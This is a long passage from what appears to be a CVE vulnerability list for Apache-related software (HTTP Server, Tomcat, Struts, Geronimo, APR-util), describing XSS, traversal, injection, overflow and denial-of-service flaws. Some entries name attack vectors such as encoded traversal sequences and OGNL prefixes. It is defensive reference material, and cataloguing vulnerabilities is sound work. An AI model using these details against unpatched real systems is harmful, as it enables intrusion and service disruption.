13329| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
13330| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
13331| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
13332| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
13333| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
13334| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
13335| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
13336| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
13337| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
13338| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
13339| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
13340| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
13341| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
13342| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
13343| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
13344| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
13345| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
13346| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
13347| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
13348| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
13349| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
13350| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
13351| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
13352| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
13353| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
13354| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
13355| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
13356| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
13357| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
13358| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
13359| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
13360| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
13361| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
13362| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
13363| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
13364| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
13365| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
13366| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
13367| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
13368| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
13369| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
13370| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
13371| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
13372| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
13373| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
13374| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
13375| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
13376| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
13377| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
13378| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
13379| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
13380| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
13381| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
13382| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
13383| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
13384| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
13385| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
13386| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
13387| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
13388| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
13389| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
13390| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
13391| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
13392| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
13393| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
13394| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
13395| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
13396| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
13397| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
13398| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
13399| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
13400| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
13401| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13402| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
13403| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
13404| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
13405| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
13406| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
13407| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
13408| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
13409| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
13410| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
13411| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
13412| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
13413| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
13414| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
13415| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
13416| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
13417| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
13418| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
13419| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
13420| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
13421| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
13422| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
13423| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
13424| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
13425| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
13426| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
13427| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
13428| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
13429| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
13430| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
13431| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
13432| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
13433| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
13434| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
13435| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
